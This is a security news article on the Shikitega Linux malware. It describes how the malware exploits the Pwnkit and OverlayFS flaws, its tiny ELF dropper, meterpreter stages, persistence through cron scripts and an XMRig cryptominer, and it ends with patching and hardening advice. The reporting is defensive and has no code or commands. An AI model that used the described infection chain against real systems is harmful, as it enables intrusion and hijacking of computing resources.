The identity and goals of the authors are as yet unknown, but the technical details have been disclosed. The malware seems to leverage the infamous Pwnkit vulnerability (CVE-2021-4034), one of the easiest exploits imaginable, and OverlayFS (CVE-2021-3493), a kernel exploit that pentesters, capture-the-flag (CTF) players, and hackers know all too well.
Indeed, the two flaws were patched months ago, but many systems aren’t up to date and thus still vulnerable.
Researchers dubbed the malware “Shikitega.” They did not explicitly say if it’s related to the use of the polymorphic XOR additive feedback encoder “Shikata Ga Nai,” but that seems like a good possibility.
See the Top Patch Management Solutions
Multistage Infection Chain
The Shikitega attack consists of a “multistage infection chain where each module responds to a part of the payload and downloads and executes the next one,” the AT&T researchers wrote. The attackers can gain escalated privileges quickly, which allows them to persist and execute the cryptominer.
Shikitega uses legitimate cloud services to host some of its C2 (command & control) servers and a very light ELF dropper (370B) to initiate the next stages. Each module focuses on a unique task, for example, downloading and executing Metasploit meterpreter, escalating privileges on the targeted systems, and maintaining persistence.
The researchers said the attackers have encoded the final payload with several layers, requiring several loops of decoding before it gets deployed, making it impossible to detect by signature-based antivirus solutions.
Five Scripts Provide Persistence
The researchers found five different scripts that aim to set four CRON jobs, which are recurrent tasks you can program on a computer system. Two of them regard the current user and the rest are for the root account.
If the crontab command is not available on the machine, which is unlikely on a Linux distribution, the malware can install it and start the service. Researchers provided the names and the purpose of these scripts:
- unix.sh: install and start the crontab service
- brict.sh: adds user crontab to execute the cryptominer
- politrict.sh: adds root crontab to execute the cryptominer
- truct.sh: adds user crontab to download the cryptominer from C&C
- restrict.sh: adds root crontab to download the cryptominer from C&C
Once the CRONs are set, there’s no need to keep downloaded files, so the malware deletes them to evade detection.
Cybercriminals Use C2 Servers to Deploy Cryptominer
Shikitega installs XMRig version 6.17.0 from the C2 servers once the persistence is achieved. The infamous XMRig mines Monero cryptocurrency that is known to be anonymity-focused, as it’s particularly hard to trace back.
Researchers noticed that cybercriminals hosted some of their C2 servers on legitimate cloud services such as OVH. This strategy seems to be a trade-off, as such services are way easier to take down by authorities, but it allows bypassing network security products that don’t block legitimate providers.
How to Protect Against Shikitega
AT&T labs provided a list of IoCs (indicators of compromise) that system administrators can use to add specific rules to security solutions.
Advanced configuration hardenings are strongly recommended. Employees should be trained against various social engineering and phishing attacks, as it’s a classic vector used by cybercriminals to deploy malware.
Last but not least, systems need to be patched, which means sysadmins must update all devices, especially Linux systems, as Linux malware is skyrocketing in 2022 — another threat reported this week is a Linux version of the Windows SideWalk backdoor. Of course, it can be hard to keep pace with the release cycles, and updates can introduce nasty regressions and bugs.
However, having devices that can be abused by Pwnkit and OverlayFS unnecessarily exposes your system to a large range of adversaries.